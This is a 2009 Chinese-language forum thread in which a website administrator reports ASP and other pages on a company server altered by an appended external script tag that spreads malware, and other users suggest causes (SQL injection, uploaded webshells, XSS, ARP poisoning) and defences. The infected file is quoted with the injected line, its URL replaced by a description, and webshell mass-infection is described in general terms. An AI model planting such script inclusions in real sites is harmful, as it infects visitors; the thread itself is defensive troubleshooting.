作者 主題: 網頁被植入<script src=http://一串很長的亂數網址.最後會連到大陸></script>  (閱讀 32513 次)

0 會員 與 1 訪客 正在閱讀本文。

bau720123

  • 可愛的小學生
  • *
  • 文章數: 16
  • 性別: 男
    • 檢視個人資料
    • 9191交易王
最近小弟在公司的網站上碰到一個現象
不管是用哪種語言寫的網頁..網頁的原始碼被植入一段script語法
<script src=http://一串很長的亂數網址.最後會連到大陸></script>
當執行該網頁時..若沒裝防毒軟體就會無預警的中毒了
想請問駭客可能是透過怎麼樣的管道來達成這種惡意行為
或是有什麼辦法能多少阻止或是延緩他的這種攻擊行為
防火牆裝了+防毒軟體裝了+掃過毒了沒毒

目前消極的處理方式只有把惡意Script透過編輯尋找取代的方式將之刪除
« 上次編輯: 2009-07-16 10:39 由 bau720123 »
邁向神乎其技的境界^^

Jerry Liu

  • 鑽研的研究生
  • *****
  • 文章數: 533
  • 性別: 男
    • 檢視個人資料
應該是程式沒寫好,或是弱點攻擊吧

我猜是sql injection

上網找一下有偵測工具,看看網站是不是有這問題
水泥森林中的狼

好懷念的暱稱啊 .................

Yamaka

  • 俺是博士!
  • *****
  • 文章數: 4913
    • 檢視個人資料
    • http://www.ecmagic.com
不管是用哪種語言寫的網頁..網頁的原始碼被植入一段script語法
<script src=http://一串很長的亂數網址.最後會連到大陸></script>
當執行該網頁時..若沒裝防毒軟體就會無預警的中毒了


主機裡的網頁原始碼直接被植入?
還是在瀏覽該網頁之後client端的html碼多了這段script?

hikohan

  • 俺是博士!
  • *****
  • 文章數: 1288
    • 檢視個人資料
fyi:
http://www.google.com.tw/search?hl=zh-TW&q=iframe+PageClear&btnG=Google+%E6%90%9C%E5%B0%8B&meta=&aq=f&oq=

先前處理的特徵,中毒的機器一定是windows已經啟動IIS,所有網頁程式script(ASP/PHP/...)都被append上iframe或script

網路上的工具,處理中文會有問題,要小心。
lifeIsFunWithPHP.

eose

  • 活潑的大學生
  • ***
  • 文章數: 499
  • 性別: 男
    • 檢視個人資料
之前常碰到的是web被放入webshell程式,副檔名為asp、aspx或php,看網站使用的程式而定.
只要放的路徑有允許執行程式碼,而執行權限又夠的話,就可以大量插入惡意語法到任何文字檔、程式碼或網頁中.

1.先檢查是否有網站不該有的檔案吧!
2.研究被放入的方式,才知道如何防堵.
3.清除被植入的惡意語法,這就比較麻煩了.

可參考http://anti-hacker.blogspot.com/2007/10/webshell.html

其他方式就待高手解答了

bau720123

  • 可愛的小學生
  • *
  • 文章數: 16
  • 性別: 男
    • 檢視個人資料
    • 9191交易王
回Jerry Liu.謝謝你的建議.我上網先找找看

回Jyamaka.
應該是說當初UPLOAD檔案時原始碼裡面根本沒這一行
是突然某一天.當我們測試網頁時.發現怎麼防毒軟體會叫
這時才想說回頭看看網頁的原始碼發生了什麼問題
經過查證.最後原始碼被串改成這樣

=====
<%@LANGUAGE="JAVASCRIPT" CODEPAGE="65001"%>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>無標題文件</title>
</head>
<body>
這是ASP的檔案
</body>
</html>
<script src=http://一串很長的亂數網址.最後會連到大陸></script>
=====

回hikohan.
的確發生這個徵狀的Windows Server 2003的系統..平時有正常的UPDATE
有用IIS跟APACHE..
工具處理有問題是嗎..我會先多找資料小心使用

回eose.
您講的webshell程式的確駭人聽聞
您這邊是否有聽聞任何的實作方法可以用來執行這種惡意行為
畢竟防堵前要先知道她是怎麼攻擊的
我看過被攻擊的網站中它的IIS相關設定屬性
在主目錄那個標籤裡面..本機下面路徑被打勾的有以下三個
讀取.紀錄查詢.編製這個資源的索引
在應用程式設定值部分
執行權限為"僅指令碼"
以上應該都是屬於正常的設定
1.因為網站的確很多.要一個一個檢查其實還挺難的.不過我會盡量試試看
2.正在研究謝謝你的建議
3.目前清除的方式就只能把那段語法取代成空白的字元.讓她暫時不會執行.我是不知道駭客會不會心血來潮又把她加回去啦
4.您後來補充說明的我已經記住了..我剛看過IIS的LOG相關紀錄好了..結果一點痕跡都沒有..都是正常的敘述跟連結

回回andyj.
這點的確是一般人常常遺忘的.我會記住.謝謝
« 上次編輯: 2009-07-16 17:55 由 bau720123 »
邁向神乎其技的境界^^

andyj

  • 鑽研的研究生
  • *****
  • 文章數: 957
    • 檢視個人資料
除了SQL Injection要除理原始碼外,請另外檢查SQL Server是否有更新Service Pack,在特定版本沒更新到,確實也有這漏洞的存在.

eose

  • 活潑的大學生
  • ***
  • 文章數: 499
  • 性別: 男
    • 檢視個人資料
實作阿,就只要想辦法把webshell放到web上就可以啦!詳細看每個web的功能而定.
我之前的經驗是web有上傳程式功能,因為帳號密碼太簡單被try成功,被放上webshell後web就被看光光&被植入惡意連結.

你應該先把網站被駭的時間點及過程弄清楚,可以先從檔案被修改的時間,來找web log看看有什麼可疑的動作,或是被放上什麼程式,這樣才可以進一步追查.
如果還有Database的話,還要檢查是否有被植入惡意的資料,這部份我是覺得更難查.

蜜蜂

  • 活潑的大學生
  • ***
  • 文章數: 276
  • 性別: 男
    • 檢視個人資料
另外可以寫個 script 定時比對 web site 的檔案有沒有被改掉, 發 mail 通知管理者.
至少可以主動一點知道狀況.



bau720123

  • 可愛的小學生
  • *
  • 文章數: 16
  • 性別: 男
    • 檢視個人資料
    • 9191交易王
回andyj.
您的建議確實不錯
可以來規劃管理看看
謝謝您的建議
邁向神乎其技的境界^^

yufeng

  • 懷疑的國中生
  • **
  • 文章數: 85
    • 檢視個人資料
最近小弟在公司的網站上碰到一個現象
不管是用哪種語言寫的網頁..網頁的原始碼被植入一段script語法
<script src=http://一串很長的亂數網址.最後會連到大陸></script>
當執行該網頁時..若沒裝防毒軟體就會無預警的中毒了
想請問駭客可能是透過怎麼樣的管道來達成這種惡意行為
或是有什麼辦法能多少阻止或是延緩他的這種攻擊行為
防火牆裝了+防毒軟體裝了+掃過毒了沒毒

目前消極的處理方式只有把惡意Script透過編輯尋找取代的方式將之刪除

這是 Cross Site Script XSS,

請上國家資通安全會報技服中心看這篇:

http://forum.icst.org.tw/phpbb/viewtopic.php?f=29&t=15572

eose

  • 活潑的大學生
  • ***
  • 文章數: 499
  • 性別: 男
    • 檢視個人資料
最近小弟在公司的網站上碰到一個現象
不管是用哪種語言寫的網頁..網頁的原始碼被植入一段script語法
<script src=http://一串很長的亂數網址.最後會連到大陸></script>
當執行該網頁時..若沒裝防毒軟體就會無預警的中毒了
想請問駭客可能是透過怎麼樣的管道來達成這種惡意行為
或是有什麼辦法能多少阻止或是延緩他的這種攻擊行為
防火牆裝了+防毒軟體裝了+掃過毒了沒毒

目前消極的處理方式只有把惡意Script透過編輯尋找取代的方式將之刪除

這是 Cross Site Script XSS,

請上國家資通安全會報技服中心看這篇:

http://forum.icst.org.tw/phpbb/viewtopic.php?f=29&t=15572
這不是XSS吧!就單純掛馬阿.

dark

  • 俺是博士!
  • *****
  • 文章數: 1533
    • 檢視個人資料
應該是程式沒寫好,或是弱點攻擊吧

我猜是sql injection

上網找一下有偵測工具,看看網站是不是有這問題
這手法通常會想要達成 Jerry 大所說的意圖為多
沒 sql service 嗎 ??

有 upload 網頁,就該了解 upload 需求
無法避免阿貓阿狗上傳 (keylogger 就知道了)
但要限制上傳毒蛇毒蠍 (注意網頁程式寫做 .. 要寫在 server 端 check)
系統面安全點的,上傳檔不要存在 web server 上

架構面用 f/w idp 阻隔 internet,也要組隔 OA 端
但這點在此例算是較無影響力的 (但仍有用處 .. 畢竟 server 不會 msn 聊天)
因為這類的手法 .. (個人認為啦 ... 因為原廠都堅稱擋的住)
站在網路設備的角度而言,這些都是正常連線行為

ps:
小弟也想知道 web server log 有什麼訊息耶
能貼出來看看嗎 (當然您要幫大家過濾出重點啦 .. 總不能貼半年份的)

yufeng

  • 懷疑的國中生
  • **
  • 文章數: 85
    • 檢視個人資料

這不是XSS吧!就單純掛馬阿.
[/quote]

掛馬比較難, 要去改別人家網頁, 才能把馬褂上

XSS 是把馬先掛在自己家, 然後在尋找目標網站

利用目標網站程式的漏洞, 沒對輸入欄位做檢查,

植一段 Script 或 Iframe 進去,

把無辜使用者導到自己家

技服中心有一份四十幾頁的簡報, 一時熊熊找不到~

eose

  • 活潑的大學生
  • ***
  • 文章數: 499
  • 性別: 男
    • 檢視個人資料

這不是XSS吧!就單純掛馬阿.

掛馬比較難, 要去改別人家網頁, 才能把馬褂上

XSS 是把馬先掛在自己家, 然後在尋找目標網站

利用目標網站程式的漏洞, 沒對輸入欄位做檢查,

植一段 Script 或 Iframe 進去,

把無辜使用者導到自己家

技服中心有一份四十幾頁的簡報, 一時熊熊找不到~
[/quote]
以樓主說的情形,是web檔案被加入惡意連結阿,單純以這情形來看是掛馬沒錯.
不過是怎麼做到的就不清楚了,看樓主查的如何了.


bau720123

  • 可愛的小學生
  • *
  • 文章數: 16
  • 性別: 男
    • 檢視個人資料
    • 9191交易王
恩恩
謝謝各方英雄的建議與指教
小弟真的是非常感謝
目前消極的方式是
把一些常被感染的資料夾或是檔案本身的權限降低
變成只能讀取且無法寫入的方式
目前小弟也還正在研究
根據網友推薦本書
www.eslite.com/product.aspx
目前還在看
有些深奧
但介紹很多疑似駭客工具(系統檢測)工具
但一切都還在學
有任何消息我也會立刻PO上來跟大家討論
再次謝謝各位..非常感謝
邁向神乎其技的境界^^

TyroneYeh

  • 俺是博士!
  • *****
  • 文章數: 2396
  • 性別: 男
    • 檢視個人資料
這之前看過,好像是 ARP 病毒造成的!
不過没找到解決方法!
因為可能是區域網路中某一台電腦中毒了,造成那個連線都會這樣!
後來因為那台是只服務內部的同仁,所以把 Web 加上 SSL 的連線方式就可以了
不懂為什麼會這樣!!
--
TyroneYeh

eose

  • 活潑的大學生
  • ***
  • 文章數: 499
  • 性別: 男
    • 檢視個人資料
可以參考看看摟http://armorize-cht.blogspot.com/2008/11/blog-post_11.html

梁楓

  • 俺是博士!
  • *****
  • 文章數: 6220
    • 檢視個人資料
你的檔案,預設是不是www的權限可以寫入?

susanqy

  • 可愛的小學生
  • *
  • 文章數: 8
    • 檢視個人資料
    • 八方國際翻譯
我的網站8月29號被挂馬
也是在網頁最後加入了一段相當長的script代碼

刪除這段代碼,網站現在還處於“已知有害網站”之中

我有一所房子
面朝大海,春暖花開
從明天起,做一個幸福的人
關心翻譯糧食和蔬菜
徵信,劈柴,喂馬,周遊世界

als.34

  • 可愛的小學生
  • *
  • 文章數: 4
    • 檢視個人資料
我上次也遇到~
可以用微軟提供的URLSCAN軟體來阻擋
另外也可以安裝ISAPI_Rewrite自己編譯httpd.ini來阻擋可能被攻擊的語法

kumee

  • 憂鬱的高中生
  • ***
  • 文章數: 130
    • 檢視個人資料
    • http://www.kume.idv.tw
看到這一篇,馬上用"SQL Injection"搜尋google,結果看到這個... =.=b
http://anti-hacker.blogspot.com/2007/04/sql-injectionweb-server.html
希望對樓主有幫助。不過已經隔了3個月了....

Error404

  • 懷疑的國中生
  • **
  • 文章數: 31
    • 檢視個人資料
不知道你的網頁空間 是否只存放你們公司的網頁.
如果有請檢查.其他網頁是否有漏洞.

應該是透過注入或上傳漏洞.
在透過shell 去做批量掛馬.感染所有頁面. :)
在shell後門,這功能也很常見.